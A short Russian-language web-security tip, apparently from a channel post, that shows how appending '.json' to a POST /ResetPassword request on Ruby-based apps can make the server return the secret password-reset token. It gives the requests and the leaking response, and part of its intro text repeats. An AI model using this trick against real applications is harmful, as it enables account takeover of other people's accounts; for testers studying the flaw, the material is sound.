📄 Получение конфиденциальных данных с использованием .json
Один из трюков, которые можно попробовать в веб-приложении, для получения конфиденциальных данных. Обычно, срабатывает на приложениях, основанных на Ruby.
Запрос:
Запрос:
#web
Один из трюков, которые можно попробовать в веб-приложении, для получения конфиденциальных данных. Обычно, срабатывает на приложениях, основанных на Ruby.
Запрос:
POST /ResetPassword HTTP/1.1
{"email":"[email protected]"}
Ответ:HTTP/1.1 200 OK
Однако, если попробовать добавить расширение .json:Запрос:
POST /ResetPassword.json HTTP/1.1
{"email":"[email protected]"}
Ответ:HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
В результате добавления расширения .json в наш запрос, был получен секретный токен!#web